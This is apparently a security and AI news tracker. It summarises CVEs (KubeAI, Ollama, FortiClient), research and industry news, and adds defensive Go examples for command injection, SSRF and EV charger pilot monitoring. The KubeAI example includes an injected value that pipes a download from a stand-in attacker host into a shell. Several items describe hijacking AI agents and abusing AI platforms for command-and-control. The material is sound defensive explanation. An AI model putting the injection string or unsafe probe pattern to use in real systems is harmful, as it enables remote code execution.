All tracked items across vulnerabilities, news, research, incidents, and regulatory updates.
Economists warn that current tools for predicting AI's impact on jobs are inadequate because they only measure "exposure" (whether AI could theoretically do a job's tasks), which doesn't account for whether employers will actually replace workers or increase productivity instead. Economist Alex Imas calls for collecting new data on how AI actually changes specific jobs and industries, since knowing a job is 28% exposed to AI tells us little about whether that job will disappear, be transformed, or become more productive.
KubeAI, a tool that runs AI models on Kubernetes (a system for managing containerized applications), has a command injection vulnerability in versions before 0.23.2: an attacker who can create Model resources can inject shell commands (arbitrary code execution instructions) into the container's startup checks. The flaw exists because the ollamaStartupProbeScript() function builds the startup probe command from user-supplied input without validating it.
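The following Go example is added here to illustrate the bug class described above; it is not KubeAI's code, and the probe script it builds (an "ollama show" of the model) is a hypothetical stand-in for whatever the real startup probe runs. It contrasts a probe command assembled by string concatenation into "sh -c" with one that validates the model reference against a strict pattern and passes it as a single argv element, plus a quoting helper for the case where a shell wrapper is unavoidable.

```go
package main

import (
	"errors"
	"fmt"
	"regexp"
	"strings"
)

// modelRefPattern is an assumed allowlist for Ollama-style references
// (registry/namespace/name:tag); no whitespace or shell metacharacters.
// It is an example rule, not KubeAI's actual validation.
var modelRefPattern = regexp.MustCompile(
	`^[A-Za-z0-9][A-Za-z0-9._-]*(/[A-Za-z0-9][A-Za-z0-9._-]*)*(:[A-Za-z0-9][A-Za-z0-9._-]*)?$`)

// ErrInvalidModelRef is returned for references that fail the pattern.
var ErrInvalidModelRef = errors.New("invalid model reference")

// ProbeCommandUnsafe mirrors the vulnerable pattern: the user-controlled
// model reference is spliced into a shell script string, so a value such as
// "llama3; curl http://attacker.example/x | sh" runs as extra commands.
func ProbeCommandUnsafe(modelRef string) []string {
	script := "ollama show " + modelRef + " >/dev/null"
	return []string{"/bin/sh", "-c", script}
}

// ProbeCommandSafe validates the reference and avoids the shell entirely:
// the probe is an argv vector, so the reference can only ever be one argument.
func ProbeCommandSafe(modelRef string) ([]string, error) {
	if !modelRefPattern.MatchString(modelRef) {
		return nil, fmt.Errorf("%w: %q", ErrInvalidModelRef, modelRef)
	}
	return []string{"ollama", "show", modelRef}, nil
}

// ShellQuote single-quotes a value for POSIX sh. Inside single quotes the
// only special character is the quote itself, which is closed, escaped
// and reopened ('\'').
func ShellQuote(s string) string {
	return "'" + strings.ReplaceAll(s, "'", `'\''`) + "'"
}

// ProbeCommandQuoted is the shell-wrapper variant for multi-command probes:
// validate first, then quote, so the reference cannot open a new command.
func ProbeCommandQuoted(modelRef string) ([]string, error) {
	if !modelRefPattern.MatchString(modelRef) {
		return nil, fmt.Errorf("%w: %q", ErrInvalidModelRef, modelRef)
	}
	script := "ollama show " + ShellQuote(modelRef) + " >/dev/null && echo ready"
	return []string{"/bin/sh", "-c", script}, nil
}

func main() {
	// Constructed attacker-controlled value as it might appear in a Model spec.
	evil := "llama3; curl http://attacker.example/x | sh"
	fmt.Println("unsafe script:", ProbeCommandUnsafe(evil)[2])
	if _, err := ProbeCommandSafe(evil); err != nil {
		fmt.Println("safe:", err)
	}
	argv, _ := ProbeCommandSafe("library/llama3.2:3b")
	fmt.Println("safe argv:", argv)
	quoted, _ := ProbeCommandQuoted("library/llama3.2:3b")
	fmt.Println("quoted script:", quoted[2])
}
```

The argv form is preferable to quoting: a Kubernetes exec probe already takes a command array, so there is no need to involve a shell at all, and the allowlist pattern then only has to protect against what "ollama" itself will do with an odd reference.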
Iran's Islamic Revolutionary Guard Corps (IRGC, a military organization) published a video threatening to destroy OpenAI's Stargate data center in Abu Dhabi if the US attacks Iran's power plants. The threat was posted to social media on April 3rd and specifically showed images of OpenAI's $30 billion facility under construction in the United Arab Emirates.
This piece is an interview with Cisco's CEO about the company's role in building networking infrastructure for AI data centers. The conversation touches on challenges like public opposition to data centers due to noise, appearance, and high electricity use, and explores whether data centers should be built in space to avoid these problems.
OpenAirInterface V2.2.0 AMF (access and mobility management function, a component that handles device connections in 5G networks) crashes when it receives an NGAP message (a protocol used for communication in 5G networks) with an invalid procedure code or incorrect PDU-type (message format indicator). For example, the software crashes if a message is sent in the wrong format, such as using successfulOutcome when InitiatingMessage is required.
This is a business news roundup covering multiple topics, including geopolitical tensions, Federal Reserve leadership, Apple's 50th anniversary, and OpenAI's acquisition of a technology podcast. The content discusses market reactions to potential U.S.-Iran negotiations, an upcoming Senate hearing for a Federal Reserve nominee, Apple's challenges in AI competition and supply chains, and OpenAI's purchase of the TBPN podcast.
Attackers are increasingly exploiting legitimate AI systems and services instead of using traditional malware, a trend called "living off the AI land." Examples include poisoning MCP servers (tools that connect AI assistants to external services) in supply chains, abusing AI platforms like Claude and Copilot as command-and-control channels (hidden pathways for sending malicious instructions), and hijacking AI agents (automated systems that perform tasks) to extract sensitive data or perform destructive actions. The shift represents a fundamental change in AI security threats, moving beyond simple prompt injection (tricking an AI by hiding instructions in its input) to more sophisticated agent hijacking (taking control of automated AI systems).
This item is a brief announcement about 'Cleanup Claude Code Paste,' posted by Simon Willison on April 6, 2026. The provided content does not include substantive details about what the tool does, what problem it addresses, or its significance.
OpenClaw, an open-source AI assistant built by an Austrian developer, sparked a major trend in China in March 2024 because it can be customized to work with Chinese AI models, unlike Western tools like ChatGPT that are inaccessible there. Users enthusiastically adapted OpenClaw's code to create personalized versions they called "lobsters," using them for tasks like e-commerce product listings, stock analysis, and productivity, with some claiming dramatic efficiency gains. The phenomenon reflects China's broader push to develop and embrace AI technology, driven by government support and the success of homegrown platforms like DeepSeek.
Google has integrated Gemini (an AI assistant that's built into Google services) into Google Maps, allowing it to help plan daily itineraries by suggesting nearby locations. The author tested this feature by having Gemini plan a full day around their city and found it effective, discovering both obvious and unexpected recommendations for places to visit.
A vulnerability (CVE-2026-5530) has been discovered in Ollama up to version 18.1 that allows attackers to perform SSRF (server-side request forgery, where an attacker tricks a server into making unwanted requests on their behalf) through the Model Pull API component. The flaw can be exploited remotely by authenticated users, and the vendor has not responded to disclosure attempts.
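The Go example below is added to show the standard defence for an SSRF of this shape; it is not Ollama's code and makes two assumptions: that the registry host to be contacted can be extracted from the pull request into a URL, and that a resolver can be injected so the check runs offline. It enforces https and a registry allowlist, pre-resolves the host and rejects loopback, private, link-local (including the cloud metadata address) and otherwise non-public ranges, and adds a net.Dialer Control hook so a DNS answer that changes between validation and connect is still caught.

```go
package main

import (
	"errors"
	"fmt"
	"net"
	"net/netip"
	"net/url"
	"strings"
	"syscall"
)

// Resolver abstracts DNS so the check is testable offline; in production
// wrap net.DefaultResolver.LookupNetIP.
type Resolver func(host string) ([]netip.Addr, error)

// ErrUnsafeTarget is returned for any pull target that fails the checks.
var ErrUnsafeTarget = errors.New("pull target rejected")

// isInternal reports whether an address is loopback, private, link-local
// (which covers 169.254.169.254), multicast or unspecified. IPv4-mapped IPv6
// is unmapped first so ::ffff:127.0.0.1 is not treated as public.
func isInternal(a netip.Addr) bool {
	a = a.Unmap()
	return a.IsLoopback() || a.IsPrivate() || a.IsLinkLocalUnicast() ||
		a.IsLinkLocalMulticast() || a.IsInterfaceLocalMulticast() ||
		a.IsMulticast() || a.IsUnspecified()
}

// ValidatePullTarget parses the registry URL, requires https and an
// allowlisted host, then resolves the host and rejects it if any answer is
// an internal address. It returns the normalised host on success.
func ValidatePullTarget(raw string, allowedRegistries []string, resolve Resolver) (string, error) {
	u, err := url.Parse(raw)
	if err != nil {
		return "", fmt.Errorf("%w: %v", ErrUnsafeTarget, err)
	}
	if u.Scheme != "https" {
		return "", fmt.Errorf("%w: scheme %q", ErrUnsafeTarget, u.Scheme)
	}
	host := strings.ToLower(u.Hostname())
	allowed := false
	for _, h := range allowedRegistries {
		if host == strings.ToLower(h) {
			allowed = true
			break
		}
	}
	if !allowed {
		return "", fmt.Errorf("%w: host %q not in allowlist", ErrUnsafeTarget, host)
	}
	// A literal IP needs no lookup; a name is resolved and every answer checked.
	addrs := []netip.Addr{}
	if ip, perr := netip.ParseAddr(host); perr == nil {
		addrs = append(addrs, ip)
	} else if addrs, err = resolve(host); err != nil {
		return "", fmt.Errorf("%w: resolve %q: %v", ErrUnsafeTarget, host, err)
	}
	for _, a := range addrs {
		if isInternal(a) {
			return "", fmt.Errorf("%w: %q resolves to internal address %s", ErrUnsafeTarget, host, a)
		}
	}
	return host, nil
}

// BlockInternalDial is a net.Dialer.Control hook. It sees the concrete
// ip:port being connected to, so rebinding after validation is still blocked.
func BlockInternalDial(network, address string, _ syscall.RawConn) error {
	host, _, err := net.SplitHostPort(address)
	if err != nil {
		return err
	}
	ip, err := netip.ParseAddr(host)
	if err != nil {
		return err
	}
	if isInternal(ip) {
		return fmt.Errorf("%w: dial to %s", ErrUnsafeTarget, address)
	}
	return nil
}

func main() {
	// Constructed offline resolver: one public registry and one name that
	// also answers with a private address (rebinding / split-horizon case).
	fake := func(host string) ([]netip.Addr, error) {
		switch host {
		case "registry.example":
			return []netip.Addr{netip.MustParseAddr("203.0.113.10")}, nil
		case "rebind.example":
			return []netip.Addr{netip.MustParseAddr("203.0.113.10"), netip.MustParseAddr("10.0.0.5")}, nil
		}
		return nil, errors.New("nxdomain")
	}
	allow := []string{"registry.example", "rebind.example"}
	for _, target := range []string{
		"https://registry.example/v2/library/llama3/manifests/latest",
		"https://rebind.example/v2/x/manifests/latest",
		"http://registry.example/v2/x",
		"https://169.254.169.254/latest/meta-data/",
	} {
		host, err := ValidatePullTarget(target, allow, fake)
		fmt.Printf("%-60s host=%q err=%v\n", target, host, err)
	}
	dialer := &net.Dialer{Control: BlockInternalDial}
	_ = dialer // attach to http.Transport.DialContext in a real client
}
```

The allowlist does most of the work for a pull API, since a model registry is a small, known set of hosts; the address checks and the dial hook are what stop a permitted name from being pointed at internal services.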
Fix for the KubeAI command injection item: upgrade to KubeAI version 0.23.2 or later, which fixes this vulnerability.
NVD/CVE Database
Researchers at Google DeepMind have described a class of attacks called 'AI Agent Traps', in which attackers host malicious web content designed to deceive AI agents (autonomous programs that can browse the web and take actions) and thereby manipulate or exploit them. This research maps out how these attacks work against AI systems that visit websites.
Healthcare workers are increasingly using AI tools on their own to handle heavy workloads, and organizations cannot stop this trend. The source emphasizes that healthcare organizations should strengthen their security practices to reduce the damage if these unsanctioned AI tools are compromised or misused.
OWASP (Open Web Application Security Project, a standards group for security best practices) has updated its generative AI security guidance to address 21 identified risks in AI systems. The update recommends that companies use separate but coordinated defense strategies tailored specifically for generative AI (AI that creates text, images, or code) and agentic AI (AI that can take actions independently).
MaliVD is a deep learning method that detects vulnerabilities (security flaws) in source code and identifies exactly which lines contain them, using a multi-modal attention mechanism (a technique that lets the AI focus on important parts of code by analyzing it in multiple ways, like looking at the code's sequence, tree structure, and relationships between components). Traditional security tools create too many false alarms and struggle with complex modern software, but MaliVD performs better than eight other detection methods by extracting different types of code features and prioritizing suspicious sections.
Researchers discovered that the SAE J1772 charging control protocol, which manages communication between electric vehicle chargers and cars, lacks proper authentication (verification that devices are who they claim to be). They created ChargeX, a hardware attack that modifies charging control signals to disrupt charging schedules, cause denial of service (DoS, making systems unavailable), or damage batteries. Tests on Tesla chargers and home chargers showed the attacks can force unwanted charging states or crash chargers into error states.
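As an added illustration of the signal ChargeX manipulates, the Go example below decodes the J1772 control pilot as the EVSE side advertises it: the positive voltage level selects the state (12/9/6/3/0/-12 V for A through F) and the 1 kHz PWM duty cycle encodes the maximum current (0.6 A per percent from 10 to 85 percent, (duty - 64) x 2.5 A above that up to 96 percent, with 5 percent reserved for digital communication). It then runs a small plausibility monitor over constructed samples that flags the behaviours the paper's attacks produce: out-of-spec levels, a charging state collapsing into an error state, and the advertised current being cut sharply. This is example code, not the researchers' ChargeX tooling; the 1 V decoding window and the anomaly thresholds are assumptions chosen for the example.

```go
package main

import (
	"errors"
	"fmt"
	"math"
)

// PilotState is the J1772 state signalled by the control pilot's positive level.
type PilotState int

const (
	StateA PilotState = iota // 12 V: no vehicle connected
	StateB                   // 9 V: vehicle connected, not ready to charge
	StateC                   // 6 V: charging, no ventilation required
	StateD                   // 3 V: charging, ventilation required
	StateE                   // 0 V: error / pilot shorted
	StateF                   // -12 V: EVSE not available / error
)

func (s PilotState) String() string { return [...]string{"A", "B", "C", "D", "E", "F"}[s] }

// ErrPilot is returned for measurements that match no valid encoding.
var ErrPilot = errors.New("control pilot out of specification")

// DecodeState maps a measured positive pilot level to a state using a 1 V
// window around each nominal level (window width is an assumption).
func DecodeState(volts float64) (PilotState, error) {
	nominal := []struct {
		v float64
		s PilotState
	}{{12, StateA}, {9, StateB}, {6, StateC}, {3, StateD}, {0, StateE}, {-12, StateF}}
	for _, n := range nominal {
		if math.Abs(volts-n.v) <= 1.0 {
			return n.s, nil
		}
	}
	return 0, fmt.Errorf("%w: %.1f V matches no state", ErrPilot, volts)
}

// DutyToAmps converts the pilot PWM duty cycle (percent) to the advertised
// maximum current. 3-7 % requests digital communication (0 A analog).
func DutyToAmps(duty float64) (float64, error) {
	switch {
	case duty >= 3 && duty <= 7:
		return 0, nil
	case duty >= 10 && duty <= 85:
		return 0.6 * duty, nil
	case duty > 85 && duty <= 96:
		return (duty - 64) * 2.5, nil
	}
	return 0, fmt.Errorf("%w: duty %.1f%%", ErrPilot, duty)
}

// Sample is one observation of the pilot line: positive level and duty cycle.
type Sample struct{ Volts, Duty float64 }

// Anomalies scans consecutive samples and reports what a monitor should flag:
// undecodable levels or duty cycles, a C/D (charging) state dropping into
// E/F (error), and the advertised current falling by more than half.
func Anomalies(samples []Sample) []string {
	var out []string
	var prevState PilotState
	var prevAmps float64
	havePrev := false
	for i, s := range samples {
		st, serr := DecodeState(s.Volts)
		amps, aerr := DutyToAmps(s.Duty)
		if serr != nil {
			out = append(out, fmt.Sprintf("sample %d: %v", i, serr))
		}
		if aerr != nil {
			out = append(out, fmt.Sprintf("sample %d: %v", i, aerr))
		}
		if serr != nil || aerr != nil {
			continue
		}
		if havePrev {
			if (prevState == StateC || prevState == StateD) && (st == StateE || st == StateF) {
				out = append(out, fmt.Sprintf("sample %d: charging interrupted, state %v -> %v", i, prevState, st))
			}
			if prevAmps > 0 && amps < prevAmps/2 {
				out = append(out, fmt.Sprintf("sample %d: advertised current cut from %.1f A to %.1f A", i, prevAmps, amps))
			}
		}
		prevState, prevAmps, havePrev = st, amps, true
	}
	return out
}

func main() {
	// Constructed trace: normal plug-in and charge, then a current cut, a drop
	// into the error state, and a duty cycle no EVSE should emit.
	trace := []Sample{{12, 50}, {9, 50}, {6, 50}, {6, 20}, {0, 50}, {6, 120}}
	for _, a := range Anomalies(trace) {
		fmt.Println(a)
	}
}
```

Because the pilot line is unauthenticated, a monitor like this cannot tell a ChargeX-style injection from a genuine fault; its value is in making unexpected state and current changes visible rather than in blocking them.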
This research paper presents VM-DSSE-FB, a new encryption method for cloud storage that lets multiple users search and update encrypted data while maintaining privacy. The system uses techniques like symmetric encryption (encoding data with a shared secret key), homomorphic addition (performing calculations on encrypted data without decrypting it first), and bitmap indexing (a method for organizing data searches) to protect against certain attacks and verify that search results are accurate and complete.
OpenAI is launching a Safety Fellowship program (September 2026 to February 2027) for external researchers to conduct independent studies on safety and alignment (making sure AI systems behave as intended and don't cause harm) of advanced AI systems. Fellows will work on topics like safety evaluation, ethics, robustness, privacy protection, and oversight of AI agents, receiving mentorship, compute resources, and a monthly stipend while producing research outputs like papers or datasets.
Commercial off-the-shelf software (COTS, meaning ready-made software products sold online or in stores) initially seems attractive because it deploys quickly and costs less than custom development, but organizations often get trapped when they want to switch platforms, as their systems become deeply entangled with the vendor's technology. AI-powered security tools are creating a new type of lock-in by relying on proprietary training data, vendor-specific threat intelligence feeds (collections of indicators showing cyber attacks), and specialized hardware, making it expensive and difficult to migrate away.
Fortinet FortiClient EMS has an improper access control vulnerability (a flaw in how the software checks who is allowed to do what) that lets unauthenticated attackers (people without login credentials) run unauthorized code or commands through specially crafted requests. This vulnerability is actively being exploited by attackers in real-world attacks.
Fix: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable. Check for signs of potential compromise on all internet accessible Fortinet products affected by this vulnerability. Apply any final mitigations provided by the vendor as soon as they become available. For vendor-specific patches and remediation steps, see: https://fortiguard.fortinet.com/psirt/FG-IR-26-099
CISA Known Exploited Vulnerabilities